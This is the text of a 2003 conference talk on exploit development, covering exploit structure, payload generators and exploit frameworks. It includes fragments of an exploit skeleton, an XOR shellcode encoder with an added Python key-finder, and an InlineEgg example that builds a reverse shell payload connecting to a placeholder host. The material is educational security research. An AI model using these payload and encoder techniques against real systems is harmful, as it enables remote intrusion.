Hack in the Box 2003
Advanced Exploit Development
Trends and Tools
H D Moore
Who am I?
- Co-founder of Digital Defense
- Security researcher (5+ years)
- Projects: DigitalOffense.net, Metasploit.com
What is this about?
1. Exploit Trends
2. Anatomy of an Exploit
3. Common Exploit Problems
4. Payload Generators
5. Exploit Frameworks
6. Metasploit v2.0 Demo!
Why should you see this?
- Exploit basics and challenges
- Recent trends and advances
- New shellcode generation tools
- Review of exploit frameworks
- Exclusive look at Metasploit v2.0
#1: Exploit Trends

More Exploit Writers
- Information reached critical mass
- Huge exploit development community

Improved Techniques
- No more local brute force
- 4-byte overwrites: GOT, SEH, PEB
Reliable Exploit Code
- Universal win32 addresses
- Allocation control techniques

Where Does This Lead?
- Shrinking exploit timeline
- Exploit tools and frameworks
#2: Anatomy of an Exploit

Exploit Components
- Target and option selection
- Network and protocol code
- Payload or shellcode
- Payload encoding routine
- Exploit request builder
- Payload handler routine
Target and option selection
- List of addresses and offsets
- Process user selected target
- Process other exploit options
- This adds up to a lot of code...
Build-up diagram, step 1: Process Options (target system: IP 1.2.3.4, OS Linux)
    ./exp -h 1.2.3.4 -p 21 -t 0
    Parsing command options...
Network and protocol code
- Resolve the target address
- Create the appropriate socket
- Connect the socket if needed
- Perform any error handling
- Start protocol negotiation
Build-up diagram, step 2: Process Options -> Network Conn (target system: IP 1.2.3.4, OS Linux)
    gethostbyname(host);
    socket(AF_INET, ...);
    connect(s, &sockaddr, 16);
    ftp_login(s, user, pass);
    Connecting to target...
Payload or shellcode
- Executes when exploit works
- Bindshell, Findsock, Adduser
- Normally written in assembly
- Stored in code as binary string
- Configuration done via offsets
Build-up diagram, step 3: Process Options -> Network Conn -> Payload (target system: IP 1.2.3.4, OS Linux)
    shellcodes[0] = "\xeb...";
    scode = shellcodes[target];
    scode[PORT] = htons(...);
    Setting target...
Payload encoding routine
- Most exploits restrict characters
- Encoder must filter these chars
- Standard type is XOR decode
- Often just pre-encode payload
- Payload options also encoded
Build-up diagram, step 4: Process Options -> Network Conn -> Payload -> Payload Encoder (target system: IP 1.2.3.4, OS Linux)
    for (x = 0; x < sizeof(scode); x++)
        scode[x] ^= 0x99;
    Encoding shellcode...
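An added example, not from the slides, of the encoder step described above: choose a single-byte XOR key so that neither the key nor any encoded byte falls in the restricted set, and, from the analyst's side, recover the key from a captured encoded blob given its expected leading bytes. The restricted set and the sample payload are constructed for the example.

```python
from typing import FrozenSet, List, Optional

# Constructed example: bytes the target protocol will not pass through
# (NUL, LF, CR and '/', a typical set for a path-based request).
RESTRICTED: FrozenSet[int] = frozenset({0x00, 0x0A, 0x0D, 0x2F})

# Constructed stand-in for a payload; it deliberately contains restricted bytes.
SAMPLE = bytes([0x90, 0x01, 0x00, 0x2F, 0x0A, 0x41, 0x42, 0x0D, 0x7F, 0x0B])


def has_restricted(buf: bytes, restricted: FrozenSet[int] = RESTRICTED) -> bool:
    """True if any byte of buf is one the request must not contain."""
    return any(b in restricted for b in buf)


def xor_encode(payload: bytes, key: int) -> bytes:
    """The slide's loop (scode[x] ^= key) as a function; XOR is its own
    inverse, so the same call decodes."""
    return bytes(b ^ key for b in payload)


def find_xor_key(payload: bytes,
                 restricted: FrozenSet[int] = RESTRICTED) -> Optional[int]:
    """Lowest single-byte key for which neither the key itself (the decoder
    stub has to carry it) nor any encoded byte is restricted; None if no
    single-byte key works and a different encoder is needed."""
    for key in range(1, 256):
        if key in restricted:
            continue
        if not has_restricted(xor_encode(payload, key), restricted):
            return key
    return None


def recover_keys(encoded: bytes, known_prefix: bytes) -> List[int]:
    """Analyst side: every single-byte key under which a captured encoded
    blob decodes to something starting with the expected leading bytes."""
    return [k for k in range(256)
            if xor_encode(encoded, k).startswith(known_prefix)]


if __name__ == "__main__":
    key = find_xor_key(SAMPLE)
    assert key is not None
    enc = xor_encode(SAMPLE, key)
    print(f"key=0x{key:02x} encoded={enc.hex()} clean={not has_restricted(enc)}")
    print("keys consistent with prefix:", recover_keys(enc, SAMPLE[:3]))
```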
Exploit request builder
- Code which triggers the vuln
- Ranges from simple to complex
- Can require various calculations
- Normally just string mangling
- Scripting languages excel at this
Build-up diagram, step 5: Process Options -> Network Conn -> Payload -> Payload Encoder -> Exploit Request (target system: IP 1.2.3.4, OS Linux)
    Sending exploit request...
    buf = web_request("/cgi-bin...");
    memcpy(buf + 100, scode, ...);
    *(unsigned long *)(buf + 480) = retaddr;
    send(s, buf, strlen(buf));
Payload handler routine
- Each payload needs a handler
- Often just connects to bindshell
- Reverse connect needs listener
- Connects console to socket
- Accounts for large chunk of code
Build-up diagram, step 6: Process Options -> Network Conn -> Payload -> Payload Encoder -> Exploit Request -> Payload Handler -> Bind Shell Payload (target system: IP 1.2.3.4, OS Linux)
    b = socket(AF_INET, ...);
    connect(b, &sockaddr, 16);
    handle_shell(b);
    Dropping to shell...
    sh-2.04# id
    uid=0(root) gid=0(root)...
#3: Common Exploit Problems

Exploit code is rushed
- Robust code takes time
- Coders race to be the first
- Old exploits are less useful
- Result: lots of broken code
Exploiting Complex Protocols
- RPC, SSH, SSL, SMB
- Exploit depends on API
- Exploit supplied as patch
- Restricts exploit environment
- Requires old software archive
Limited Target Sets
- One-shot vulnerabilities suck
- Always limited testing resources
- Finding target values takes time
Payload Issues
- Most hardcode payloads
- Firewalls can block bind shells
- Custom config breaks exploit
- No standard payload library
#4: Payload Generators

Generator Basics
- Dynamic payload creation
- Use a high-level language
- Useful for custom situations
Many Generator Projects
- Only a few are usable
- Spawned from frameworks
- Impressive capabilities so far
Impurity (Alexander Cuttergo)
- Shellcode downloads to memory
- Executable is statically linked C
- Allows library functions
- No filesystem access required
- Supports Linux on x86
Shellforge (Philippe Biondi)
- Transforms C to payload
- Uses GCC and Python
- Includes helper API
- Simple and usable
Shellforge Example:

    #include "include/sfsyscall.h"

    int main(void)
    {
        char buf[] = "Hello world!\n";
        /* sizeof(buf) - 1 leaves out the trailing NUL of the string literal */
        write(1, buf, sizeof(buf) - 1);
        exit(0);
    }
MOSDEF (Immunity Inc)
- GPL spawn of CANVAS
- Dynamic code via Python
- API loader via import tags
- Compile, send, exec, return
- Version 0.1 not ready to use
MOSDEF Example:

    #import "remote", "Kernel32._lcreat" as "_lcreat"
    #import "string", "filename" as "filename"
    // start of code
    void main()
    {
        int i;
        i = _lcreat(filename);
        sendint(i, i);
    }
InlineEgg (CORE SDI)
- Spawn of CORE Impact
- Dynamic code via Python
- Non-commercial use only
- Supports Linux, BSD, Windows...
InlineEgg Example:

    from inlineegg.inlineegg import *
    import socket

    # placeholder values; a real exploit fills these in from its options
    connect_addr, connect_port = '192.0.2.10', 4444

    egg = InlineEgg(Linuxx86Syscall)

    # connect to other side
    sock = egg.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock = egg.save(sock)
    egg.connect(sock, (connect_addr, connect_port))

    # dup and exec
    egg.dup2(sock, 0)
    egg.dup2(sock, 1)
    egg.dup2(sock, 2)
    egg.execve('/bin/sh', ('bash', '-i'))
#5: Exploit Frameworks

Framework Basics
- Library of common routines
- Simple to add new payloads
- Minimize development time
- Platform for new techniques
Public Exploit Frameworks
- Two stable commercial products
- Handful of open source projects
- New projects in stealth mode
CORE Impact (CORE SDI)
- Strong product, 2+ years old
- Skilled development team
- Massive number of exploits
- Python and C++ (Windows)
- Starts at $15,000 USD
CORE Impact (CORE SDI), continued
- Stable syscall proxy system
- Full development platform
- Discovery and probe modules
- Macro function capabilities
- Integrated XML reporting
Windows ASM Components
- Solid design, great features
- Includes skeleton and manager
- Full source code is available
- Written in C and ASM
- Modular development system
Windows ASM Components, continued
- Small first stage component
- Installs payload over network
- Avoids bytes with XOR encoder
- Fork, Bind, Connect, Findsock
CANVAS (Immunity Inc)
- New and gaining ground
- Small set of reliable exploits
- Includes non-public 0-day
- Supports Linux & Windows
- Priced at $995 USD
CANVAS (Immunity Inc), continued
- Working syscall proxy system
- Solid payload encoder system
- Includes API for developers
- Exploits Solaris, Linux, Windows
- Automatic SQL injection module
LibExploit (Simon Femerling)
- New project, improving quickly
- C library to simplify development
- Includes two sample exploits
- Currently supports Linux x86
- Released as open source (GPL)
LibExploit (Simon Femerling), continued
- Includes ~30 stock payloads
- Generates dynamic payloads
- Can encode with ADMutate
- Common networking API
- Built-in exploit console
Metasploit Exploit Framework
- Complete exploit environment
- Small set of reliable exploits
- Trivial to use new payloads
- Handlers and callbacks
- Full source code (OSS)
Metasploit Exploit Framework, continued
- Modular and extensible API
- Protocol modules and routines
- Easy to add new interfaces
- Designed to allow embedding
- Very active development
Questions?
Metasploit Framework Demonstration